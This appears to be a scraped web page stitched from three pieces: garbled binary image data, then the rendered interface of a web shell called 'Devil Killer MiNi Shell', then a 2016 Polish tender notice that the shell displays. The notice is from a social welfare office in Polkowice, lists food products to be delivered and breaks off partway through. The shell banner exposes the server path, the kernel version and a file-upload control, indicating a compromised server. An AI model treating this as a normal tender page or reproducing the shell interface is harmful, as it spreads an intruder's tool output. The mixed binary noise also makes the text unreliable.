JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160114/9866-N-2016.html

<p class="kh_header"><b>Polkowice: Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach</b><br>
<b>Numer ogłoszenia: 9866 - 2016; data zamieszczenia: 14.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Lipowa 2, 59-100 Polkowice, woj. dolnośląskie, tel. 76 7246700, 7246704, faks 76 7246703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.polkowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.ops.polkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych w ramach Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach Dostarczany przedmiot dostawy musi odpowiadać wymogom określonym przez rozporządzenie (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. U. L 139 z 30.04.2004, str. 1 - 54; Polskie wydanie specjalne Rozdział 13, Tom 34, str. 319), jak również ustawę z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tj. Dz. U. z 2010 r. Nr 136, poz. 914) oraz przez inne akty prawne z zakresu prawa żywnościowego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.30.00.00-1, 15.80.00.00-5, 15.81.00.00-9, 03.14.25.00-3, 15.87.00.00-7, 15.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy oraz nie podlegają wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać wykonanie, a gdy dostawy mają charakter ciągły lub okresowy i nie zostały zrealizowane, aktualne wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności przez wykonawcę jest krótszy, 
to w tym okresie, co najmniej dwóch dostaw realizowanych na podstawie dwóch odrębnych umów i mających za przedmiot artykuły żywnościowe dostarczane na potrzeby stołówek szkolnych, przedszkoli lub innych zakładów zbiorowego żywienia z podaniem ich wartości, przedmiotu, dat wykonania oraz załączyć dokumenty (np. referencje), że te dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnią warunki określone w art. 22 ust.1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 4 - doświadczenie wykonawcy
Dokumenty potwierdzające należyte wykonanie względnie wykonywane 
(np. referencja) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności przez wykonawcę 
jest krótszy to w tym okresie, co najmniej dwóch dostaw realizowanych 
na podstawie dwóch odrębnych umów i mających za przedmiot artykuły żywnościowe dostarczane na potrzeby stołówek szkolnych, przedszkoli lub innych zakładów zbiorowego żywienia. 
Pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty 
przez pełnomocnika; 
W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika; 
W przypadku składania oferty przez podmioty występujące wspólnie, dokumenty, tj.: oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy, 
oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp oraz dokument wymieniony w punkcie 1.1 lit. b muszą być złożone przez każdy podmiot; 
Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki; 
Oświadczenia wykonawcy zgodnie z załącznikiem nr 3 Formularza ofertowego 
W przypadku osób fizycznych zaleca się złożenie zaświadczenia o wpisie 
do ewidencji działalności gospodarczej zawierające wskazanie prowadzonej działalności gospodarczej 
Załącznik numer 5 Informacja o przynależeniu do grupy kapitałowej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ops.polkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.ops.polkowice.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2016 godzina 11:00, miejsce: Ośrodek Pomocy Społecznej w Polkowicach
ul. Lipowa 2
59-100 Polkowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-PRODUKTY MLECZARSKIE 
Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	Jogurt owocowy, poj. 125g, z duża zawartością owoców, wyraźnie oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez dodatku substancji słodzących zdefiniowanych w rozporządzeniu ( WE) nr 1333/2008,bez  uszkodzeń mechanicznych.	Szt.	10
2	Mleko świeże 2% , dobrej jakości, wyraźnie podany termin przydatności do spożycia  bez dodatku cukru i substancji słodzących, w kartonie	litry	264
3	Ser żółty bloki (salami ,gouda, edamski )  wyraźnie oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez dodatku substancji słodzących zdefiniowanych w rozporządzeniu ( WE) nr 1333/2008,bez  uszkodzeń mechanicznych.	kg	6
4	Śmietana 30% op. karton 500 g,  wyraźnie oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez dodatku substancji słodzących zdefiniowanych w rozporządzeniu ( WE) nr 1333/2008,bez  uszkodzeń mechanicznych.	Szt.	3
5	Twaróg krajanka  półtłusty bloki  na kg,  wyraźnie oznakowany termin przydatności do spożycia, zawierające nie więcej niż 10 g cukrów w 100ml produktu gotowego do spożycia, bez dodatku substancji słodzących zdefiniowanych w rozporządzeniu ( WE) nr 1333/2008,bez  uszkodzeń mechanicznych.	kg	2
			
6	Margaryna mleczna, 250 g, wyraźnie podany termin przydatności do spożycia, bez  uszkodzeń mechanicznych.	Szt.	10
7	Śmietana 18%, tł. 400g, I gatunek, wyraźnie podany termin przydatności do spożycia, bez  uszkodzeń mechanicznych	Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach -MIĘSO, PRODUKTY MIĘSNE, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-MIĘSO, PRODUKTY MIĘSNE, WĘDLINY 
Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	Kiełbasa biała wieprzowa, parzona, zawierający min 70% mięsa i nie więcej niż 10 g tłuszczu w 100g produktu gotowego do spożycia, bez dodatku żadnych konserwantów, wzmacniaczy smaku i innych emulgatorów o właściwych cechach organoleptycznych, świeży o właściwych cechach organoleptycznych.	kg	4
2	Kiełbasa śląska, zawierająca min 70% mięsa i nie więcej niż 10 g tłuszczu w 100g produktu gotowego do spożycia, bez dodatku żadnych konserwantów, wzmacniaczy smaku i innych emulgatorów o właściwych cechach organoleptycznych, świeży o właściwych cechach organoleptycznych.	kg	6
3	Parówki, wyrób drobiowy, drobno rozdrobniony, wędzony, parzony, o zawartości piersi z kurcząt min 74% bez dodatku glutanaminianu sodu, fosforanu, wzbogacone kwasami omega 3 i 6 o właściwych cechach organoleptycznych.	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-RÓŻNE PRODUKTY SPOŻYWCZE 
Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	Cukier waniliowy op. 16 g , bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia, bez śladów uszkodzeń mechanicznych,	Szt.	3
2	Cukier op. 1 kg, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	kg	15
3	Herbata czarna ekspresowa , 91 g, 50 szt., oryginalne opakowanie, bez śladów uszkodzeń mechanicznych	szt.	10
4	Kisiel z cukrem, różne smaki, bez sztucznych barwników, 77g, oryginalne opakowanie, bez śladów uszkodzeń mechanicznych	Szt.	25
5	Makaron op. 1 kg z pszenicy durum (spaghetti, farfalle, linguinie, penne, rigatoni, rigate, literki,  świderki, muszelki, zacierka) bez śladów uszkodzen mechanicznych,  bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości soli/sodu wyraźnie podany termin przydatności do spożycia.	kg	10
6	Mąka pszenna typ 450 op. 1 kg, bez śladów uszkodzeń mechanicznych,  bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli	kg	15
7	Mąka ziemniaczana op. 1 kg, bez śladów uszkodzeń mechanicznych,  bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli ,  wyraźnie podany termin przydatności do spożycia	kg	2
8	Musztarda łagodna op. 200 g w opakowaniu szklanym , bez śladów uszkodzeń mechanicznych,   bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli ,  wyraźnie podany termin przydatności do spożycia	szt.	5
9	Majonez op 400 g w opakowaniu szklanym, min. 80g tł. bez śladów uszkodzeń mechanicznych,   bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008, o niskiej zawartości sodu/soli ,  wyraźnie podany termin przydatności do spożycia	szt.	4
10	Herbata rozpuszczalna o różnych smakach, op. 300g, granulowana, w 100g produktu: 94,8g cukru, gat. I,  wyraźnie podany termin przydatności do spożycia	szt.	76
11	Syrop owocowy, poj. 430 ml, różne smaki,w 100ml soku 70 gr cukru, gat I, bez uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia	szt.	525
12	Sól miałka o obniżonej zawartości sodu (bez antyzbrylacza) z dodatkiem potasu i magnezu, wyraźnie podany termin przydatności do spożycia, bez widocznych śladów uszkodzeń mechanicznych.	kg	5
13	Żurek z czosnkiem w płynie, op. 500ml, bez konserwantów, bez barwników, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	szt.	7
			
14	Barszcz czerwony, 49g, w proszku do rozpuszczenia 49,6 g suszone warzywa - oryginalne opakowania, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	30
15	Barszcz biały w proszku do rozpuszczenia 65 gr, oryginalne opakowanie, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	10
16	Budyń z cukrem 60g, różne smaki, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	15
17	Keczup 500g, oryginalne opakowanie, wyraźnie podany termin przydatności do spożycia.	Szt.	10
			
18	Woda mineralna niegazowana, całkowita mineralizacja 258,50mg/l, poj. 6l, wyraźnie podany termin przydatności do spożycia.	Szt.	483
19	Kakao granulowane rozpuszczalne o różnych smakach 300g., w 100g produktu: 82,6g cukru, 1,8g, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	55
20	Brzoskwinie w puszce, masa owoców po odsączeniu470g, masa brutto 850g, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	5
21	Galaretka różne smaki, 79g, produkt suchy, gotowy do sporządzenia, wyraźnie podany termin przydatności do spożycia.	Szt.	30
22	Sernik błyskawiczny 193g, sypki produkt gotowy do sporządzenia, w 100g produktu - 3,8g tłuszczu, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	10
23	Szynka wieprzowa konserwowa z galaretką 455g - zawartość szynki 80%, w 100g produktu 4g tłuszczu, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	5
24	Polewa twarda mleczna, ciemna czekolada 100g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	10
25	Biszkopty Wrocławskie okrągłe, 120g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	10
26	Lizak płaski owocowy, 100szt. w opakowaniu bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	3
27	Wafle domowe kwadratowe - gotowe do spożycia, 12 szt. w opakowaniu bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	10
28	Posypka, dekoracyjna cukrowa do ciast, 80g, gotowa do spożycia bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	7
29	Popcorn solony do mikrofalówki, 90g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	30
30	Krem czekoladowy z orzechami 350g. typu nutella lub równoważny. Krem do smarowania z orzechami laskowymi i kakao 7,4% w 100g produktu 31,6 g tłuszczu	Szt.	5
31	Bita śmietana śnieżka, torebka, 51g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	20
32	Pisaki cukrowe do dekoracji, 4 tubki w opakowaniu, 76g. bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	10
33	Przysmak świętokrzyski do smażenia, 400g. bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	20
34	Cukierki mix owocowe miękkie, typu toffi lub równoważne, 1 kg, nie zawierają orzechów bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	3
34	Cukierki miękkie rozpuszczalne, wieloowocowe, 3 kg, nie zawierają orzechów bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
36	Ciastka kruche w polewie o smaku czekoladowym, opakowanie 2,5 kg, nie zawierają orzechów bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
37	Ciastka kruche przełożone masą, opakowanie 2 kg, nie zawierają orzechów bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
38	Cukierki do żucia wieloowocowe, 2,5 kg bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
39	Czekolada mleczna 100g, różne smaki nadzienia bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	60
40	Wafelki o smaku kakaowym 3 kg bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
41	Chrzan delikatesowy o łagodnym smaku, poj. 185 gr. bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	2
42	Biszkopty z marmoladą i pianką, 500g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
43	Galaretki w czekoladzie 490g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Op.	2
44	Woda mineralna niegazowana, całkowita mineralizacja 258,50 mg/l poj.0,5 l bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia.	Szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-OWOCE, WARZYWA, PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-OWOCE, WARZYWA, PRZETWORY 
Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	Ananas w syropie op.  565 g  bez śladów uszkodzeń mechanicznych, spożycia, wyraźnie podany termin przydatności do spożycia	szt	2
